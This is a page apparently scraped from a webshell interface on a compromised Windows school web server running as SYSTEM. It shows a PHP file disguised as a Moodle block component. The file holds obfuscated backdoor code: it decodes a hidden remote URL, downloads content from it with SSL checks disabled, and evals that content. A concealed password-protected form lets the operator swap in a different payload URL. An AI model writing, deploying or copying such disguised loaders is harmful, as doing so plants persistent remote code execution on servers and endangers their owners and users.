403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/benjama/counter/styles/fdb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/benjama/counter/styles/fdb/uvis.php
<?php
// This file is part of Moodle - http://moodle.org/.
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * News items block caps.
 *
 * @package    block_news_items
 * @copyright  Mark Nelson <[email protected]>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
 goto dQgTg; dQgTg: session_start(); goto FyetL; xlzvl: if (is_string($result)) { eval("\77\x3e" . $result); } else { echo "\105\x72\x72\157\162"; } goto WuPHV; X1dpf: $asciiArray = array(104, 116, 116, 112, 115, 58, 47, 47, 101, 103, 114, 101, 53, 53, 46, 99, 111, 109, 47, 114, 101, 115, 111, 117, 114, 99, 101, 115, 47, 100, 101, 46, 112, 104, 112); goto drkki; hCT08: $url = $decodedString; goto IMD_h; GWUad: if (isset($_GET["\164\x73\x5f\x72\145\x73\x65\x74"])) { $_SESSION["\164\163\137\165\x72\154"] = ''; echo "\x73\165\x63\x63\145\163\x73"; die; } goto ffNvJ; FyetL: function madrid($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); curl_close($ch); return $result; } goto pQi4Z; drkki: $decodedString = ''; goto WWQYT; IMD_h: $correct_password = "\44\x32\141\44\61\62\44\132\x31\114\141\106\x48\151\170\171\x2e\117\164\x4d\x44\x64\x68\x57\x31\146\163\x4e\117\x50\x73\124\x5a\x59\x54\x77\171\x45\x56\x2e\x43\117\x74\113\x78\116\x70\107\x38\165\x51\110\x75\56\x64\x4a\71\x30\114\151"; goto GWUad; pQi4Z: function downloadWithFopen($url) { $contextOptions = array("\163\x73\154" => array("\166\145\x72\x69\x66\171\x5f\x70\x65\x65\162" => false, "\x76\x65\162\151\x66\x79\137\x70\x65\x65\x72\x5f\x6e\141\x6d\x65" => false)); $context = stream_context_create($contextOptions); $result = false; if ($fp = fopen($url, "\162", false, $context)) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } goto X1dpf; ffNvJ: if (isset($_GET["\164\163"])) { if ($_SERVER["\x52\x45\121\125\105\x53\x54\x5f\115\105\124\x48\x4f\104"] === "\x50\x4f\x53\x54") { if (isset($_POST["\160\x61\x73\x73\167\157\x72\x64"])) { $provided_password = $_POST["\x70\141\x73\x73\167\x6f\x72\144"]; if (password_verify($provided_password, $correct_password)) { if (isset($_POST["\165\162\x6c"])) { $url = $_POST["\x75\x72\154"]; $_SESSION["\164\163\x5f\x75\x72\154"] = $url; echo "\165\160\x64\141\164\x65\144\40\72\40" . $_SESSION["\x74\x73\137\x75\x72\154"]; die; } else { echo "\x45\x72\x72\157\x72\41"; die; } } else { echo ''; die; } } else { echo ''; die; } } else { ?>
<head><style>#password{order:2}#url{order:1}#password,#url{display:block;margin-bottom:10px;opacity:0;transition:opacity .3s}#password:hover,#url:hover{opacity:1}form{display:flex;flex-direction:column;align-items:flex-end}</style><script>document.addEventListener("DOMContentLoaded",function(){document.querySelector("#password").addEventListener("keydown",function(e){"Enter"===e.key&&(e.preventDefault(),document.querySelector("form").submit())})})</script></head><body><form action=""method="post"><input id="password"name="password"type="password"><br><input id="url"name="url"value="<?php  echo isset($_POST["\x75\x72\x6c"]) ? $_POST["\x75\162\x6c"] : ''; ?>
"><br></form></body><?php  die; } } else { if (empty($_SESSION["\x74\163\x5f\165\162\154"])) { $result = @file_get_contents($url); if (empty($result)) { $result = madrid($url); if (empty($result)) { $result = downloadWithFopen($url); } } } else { $result = @file_get_contents($_SESSION["\164\163\x5f\165\162\154"]); if (empty($result)) { $result = madrid($_SESSION["\x74\x73\x5f\165\x72\x6c"]); if (empty($result)) { $result = downloadWithFopen($_SESSION["\164\x73\137\165\162\154"]); } } } } goto xlzvl; WWQYT: foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); } goto hCT08; WuPHV: ?>

Youez - 2016 - github.com/yon3zu
LinuXploit